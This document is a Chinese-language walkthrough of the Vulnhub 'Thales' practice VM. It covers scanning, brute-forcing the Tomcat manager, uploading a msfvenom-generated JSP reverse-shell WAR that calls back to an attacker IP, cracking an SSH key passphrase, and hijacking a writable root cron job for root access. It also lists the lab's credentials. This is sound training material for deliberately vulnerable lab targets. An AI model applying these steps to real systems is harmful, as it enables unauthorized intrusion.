Vulnhub靶机：Thales

Vulnhub

简介

Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

下载地址：https://download.vulnhub.com/thales/Thales.zip

下载下来解压。这里我用的是Oracle VirtualBox。

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth0 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.31.60

nmap 192.168.31.60 -A -O -p-

• -A 进行全面扫描，包括服务版本探测、操作系统检测等。
• -O 进行操作系统检测，尝试识别远程主机的操作系统类型。
• -p 指定要扫描的端口范围或特定端口，如1-65535或80,443。后使用namp扫描靶机。

开放22，8080。

8080端口开的是Tomcat。直接爆破了。msf或者hydra都可以。msf比较快我就用msf了

设置一下就好了。

tomcat
role1

登录之后可以上传一个war，那就可以拿shell了。

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.31.224 LPORT=4444 -f war -o revshell.war

用这个生成一个，或者在网上找一个都可以。

拿到shell后看一下有没有另外的用户。找到一个，这个用户我们可以看他的密钥。

那就拿下来，爆破一下就好了。

vodka06

拿到用户之后跑一下脚本。

定时任务。看一下这个定时任务可以搞什么事情。

这个定时还是root用户的。而且我们还可以写入。那就直接弹shell。等一下就可以了。